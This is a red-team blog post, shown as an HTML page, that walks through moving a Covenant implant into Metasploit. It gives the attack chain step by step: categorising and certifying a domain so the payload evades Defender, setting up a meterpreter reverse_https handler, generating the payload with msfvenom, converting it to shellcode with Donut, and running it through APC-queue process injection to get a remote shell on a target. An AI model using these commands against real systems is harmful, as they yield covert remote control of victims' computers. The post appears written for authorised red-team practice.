<!doctype html>
<html lang="en-us">
  <head>
    <title>PASSING A SHELL FROM COVENANT TO METASPLOIT // Tatula</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.68.3" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Tatula" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://t4tul4.github.io/css/main.min.e3e673b07e6fcbedc1992304863ca607d598988089b7f690a51a8297034a9c03.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="PASSING A SHELL FROM COVENANT TO METASPLOIT"/>
<meta name="twitter:description" content="PASSING A SHELL FROM COVENANT TO METASPLOIT You might be wondering why i needed to move a shell/grunt from covenant to msf.
There are a couple of reasons, they include:
 It is open source and actively developed. Its supports large testing networks by making use of CIDR identifiers. It offers smart payload generation and switching mechanism. It has more exploits. It offers recursive download of files.  I will divide it into two parts."/>

    <meta property="og:title" content="PASSING A SHELL FROM COVENANT TO METASPLOIT" />
<meta property="og:description" content="PASSING A SHELL FROM COVENANT TO METASPLOIT You might be wondering why i needed to move a shell/grunt from covenant to msf.
There are a couple of reasons, they include:
 It is open source and actively developed. Its supports large testing networks by making use of CIDR identifiers. It offers smart payload generation and switching mechanism. It has more exploits. It offers recursive download of files.  I will divide it into two parts." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://t4tul4.github.io/posts/passing-a-shell-from-covenant-to-metasploit/" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://t4tul4.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="Tatula" /></a>
      <h1>Tatula</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>Infosec Enthusiast and Red teamer.</p>
      <div class="app-header-social">
        
          <a href="https://t4tul4.github.io/" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://twitter.com/Nyawira1" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>Twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">PASSING A SHELL FROM COVENANT TO METASPLOIT</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jan 1, 0001
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          3 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://t4tul4.github.io/tags/books/">books</a>
              <a class="tag" href="https://t4tul4.github.io/tags/test/">test</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="passing-a-shell-from-covenant-to-metasploit">PASSING A SHELL FROM COVENANT TO METASPLOIT</h1>
<p>You might be wondering why i needed to move a shell/grunt from covenant to msf.</p>
<p>There are a couple of reasons, they include:</p>
<ul>
<li>It is open source and actively developed.</li>
<li>Its supports large testing networks by making use of CIDR identifiers.</li>
<li>It offers smart payload generation and switching mechanism.</li>
<li>It has more exploits.</li>
<li>It offers recursive download of files.</li>
</ul>
<p>I will divide it into two parts. Part one covers starting metasploit with a valid certificate and part two  covers passing a shell to msf.</p>
<h2 id="part-one">Part One</h2>
<h3 id="starting-metasploit-with-a-valid-certificate">Starting Metasploit with a valid certificate</h3>
<p>The  first step is to make sure that you start metasploit with a valid certificate.</p>
<p>This step is very important as it will make sure your payload is not flagged by defender.</p>
<h4 id="step-1">Step 1:</h4>
<h6 id="domain-categorization">Domain Categorization</h6>
<p>We will use a tool called <a href="https://github.com/mdsecactivebreach/Chameleon.git">Chameleon</a>,  it assists red teams in categorising their infrastructure under arbitrary categories.</p>
<p>Currently, the tool supports arbitrary categorisation for Bluecoat, McAfee Trustedsource and IBM X-Force.</p>
<p>Installation:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">git clone https://github.com/mdsecactivebreach/Chameleon.git 
cd Chameleon/  
chmod +x chameleon.py
</code></pre></div><p>Usage:</p>
<p>Checking the category of your website against all supported proxies.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">python chameleon.py --proxy a --check --domain DOMAIN.COM
</code></pre></div><p>Check on virus total if your domain is clean. This checks if its flagged for phishing or malicious purposes.</p>
<p><img src="/images/virustotal.png" alt="[virustotal.png]"></p>
<p>You can also check if its blacklisted on MXToolBox.</p>
<p><img src="/images/mxtoolbox.png" alt="[mxtoolbox.png]"></p>
<h4 id="step-2">Step 2:</h4>
<h6 id="domains-and-dns-configuration">Domains AND DNS Configuration</h6>
<p>We need to setup the DNS records.
Login into <a href="https://ap.www.namecheap.com/">namecheap</a>
Select Domain list and choose a domain name.</p>
<p><img src="/images/namecheap.png" alt="[namecheap.png]"></p>
<p>Then select manage, click the advanced DNS tab and start populating the various fields.</p>
<p>Create two A records (@ and mail) that point to your mail server’s IP address.</p>
<p><img src="/images/Arecord.png" alt="[Arecord.png]"></p>
<p>Test your DNS propagation, use the <strong><em>A option</em></strong> using <a href="https://dnschecker.org/">Dns checker</a></p>
<p><img src="/images/dnsArecord.png" alt="[dnsArecord.png]"></p>
<p>Finally, create a Custom MX Record in the Mail Settings section.</p>
<p><img src="/images/mxRecord.png" alt="[mxRecord.png]"></p>
<p>Test your DNS propagation, use the <strong><em>MX option</em></strong> using <a href="https://dnschecker.org/">Dns checker</a></p>
<p><img src="/images/mxDNS.png" alt="[mxDNS.png]"></p>
<h4 id="step-3">Step 3</h4>
<h6 id="https-certificate">HTTPS Certificate</h6>
<p>We need to generate a https certificate for our msf.
We are going to use <strong><em>Lets encrypt</em></strong>
Make sure you generate a certificate for both <strong>DOMAIN.COM</strong> and <strong>www.DOMAIN.COM</strong>.</p>
<p>Install certbot</p>
<p><img src="/images/certbot1.png" alt="[cerbot1.png]"></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">sudo apt-get install certbot python-certbot-apache
</code></pre></div><p>This installs the certificate only.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">sudo certbot certonly --apache --agree-tos --register-unsafely-without-email -d_ &lt;Domain name&gt;
</code></pre></div><p><img src="/images/certbot2.png" alt="[certbot2.png]"></p>
<p>Restart the server.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">reboot
</code></pre></div><p>This installs the certificate for you in the domain.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">sudo certbot --apache --agree-tos --register-unsafely-without-email -d_ &lt;Domain name&gt;
</code></pre></div><p><img src="/images/certbot3.png" alt="[certbot3.png]"></p>
<p>Verify that you have a https certificate on your domain name.</p>
<p><img src="/images/certbot4.png" alt="[certbot4.png]"></p>
<h4 id="step-4">Step 4</h4>
<h6 id="install-metasploit">Install Metasploit</h6>
<p>I used <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly-Installers</a> wiki to install my msf.</p>
<p>We then have to merge cert.pem and privatekey.pem to form one https certificate.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">sudo cat /etc/letsencrypt/live/domainName.com/cert.pem /etc/letsencrypt/live/domainName.com/privkey.pem &gt; domainName.pem
</code></pre></div><p><img src="/images/https.png" alt="[https.png]"></p>
<h4 id="step-5">Step 5</h4>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell"><span style="color:#75715e">###### Start Metasploit</span>

We are going to start metasploit with this command

./msfconsole
</code></pre></div><p><img src="/images/msf.png" alt="[msf.png]"></p>
<p>We&rsquo;ll use <strong>multi/handler</strong> exploit and populate the following options</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">use exploit/multi/handler  
 
set payload windows/x64/meterpreter/reverse<span style="color:#ae81ff">\_</span>https  
 
set LHOST &lt;IP&gt;  
 
set LPORT &lt;PORT&gt;  
 
set HandlerSSLCert /home/bottley/C2s/msf/domainName.pem
</code></pre></div><p><img src="/images/msf4.png" alt="[msf4.png]"></p>
<h4 id="step-6">Step 6</h4>
<h6 id="process-injection">Process Injection</h6>
<p>Start an msf payload using <strong>msfvenom</strong></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">./msfvenom -p windows/x64/meterpreter/reverse<span style="color:#ae81ff">\_</span>https LHOST<span style="color:#f92672">=</span>&lt;IP&gt; LPORT<span style="color:#f92672">=</span>&lt;PORT&gt; -f exe &gt; msf.exe
</code></pre></div><p><img src="/images/msfvenom.png" alt="[msfvenom.png]"></p>
<p>After generation of the payload we need to transfer the payload to your local host.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">python -m SimpleHTTPServer <span style="color:#ae81ff">8000</span>
</code></pre></div><p>Then convert the malicious exe to shellcode using <a href="https://github.com/TheWover/donut">Donut</a></p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">sudo ./donut -a2 msf.exe -o msf.bin
</code></pre></div><p><img src="/images/donut.png" alt="[donut.png]"></p>
<p>Convert the bin file from donut to base64 shellcode.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell"><span style="color:#f92672">[</span>System.Convert<span style="color:#ae81ff">\]</span>::ToBase64String<span style="color:#f92672">(</span><span style="color:#ae81ff">\[</span>System.IO.File<span style="color:#ae81ff">\]</span>::ReadAllBytes<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;C:\\Users\\Kaffe\\msf.bin&#34;</span><span style="color:#f92672">))</span> | clip
</code></pre></div><p>Execute the APC Queue Process Injection technique.</p>
<p>I used 3xpl01tc0d3r process injection you can download from <a href="https://github.com/3xpl01tc0d3r/ProcessInjection">here</a></p>
<p>I modified the code a bit, i merged the parameters into one code.</p>
<p>Execute the payload</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">.<span style="color:#ae81ff">\P</span>rocessInjection.exe /f:base64 /t:7
</code></pre></div><p><img src="/images/process.png" alt="[process.png]"></p>
<p>On process hacker we can verify that the payload spawned <strong>explorer.exe</strong></p>
<p><img src="/images/results1.png" alt="[results1.png]"></p>
<p>On msf we get a shell.</p>
<p><img src="/images/results2.png" alt="[results2.png]"></p>
<h2 id="part-two">Part Two</h2>
<h3 id="passing-a-shell-from-covenant-to-metasploit-1">Passing a shell from Covenant to Metasploit</h3>
<h5 id="step-1-1">Step 1</h5>
<p>Start metasploit</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-shell" data-lang="shell">./msfconsole
</code></pre></div><p><img src="/images/msf4.png" alt="[msf4.png]"></p>
<h5 id="step-2-1">Step 2</h5>
<p>Generate a grunt in covenant</p>
<p><img src="/images/pass2.png" alt="[pass2.png]"></p>
<h5 id="step-3-1">Step 3</h5>
<p>Upload the ProcessInjection.exe that you generated earlier</p>
<p><img src="/images/pass3.png" alt="[pass3.png]"></p>
<h5 id="step-4-1">Step 4</h5>
<p>Execute it</p>
<p><img src="/images/pass4.png" alt="[pass4.png]"></p>
<p><strong>Results</strong></p>
<p>In Covenant</p>
<p><img src="/images/cov1.png" alt="[cov1.png]"></p>
<p>In Metasploit</p>
<p><img src="/images/cov2.png" alt="[cov2.png]"></p>
<p>In the targets machine</p>
<p><img src="/images/cov3.png" alt="[cov3.png]"></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
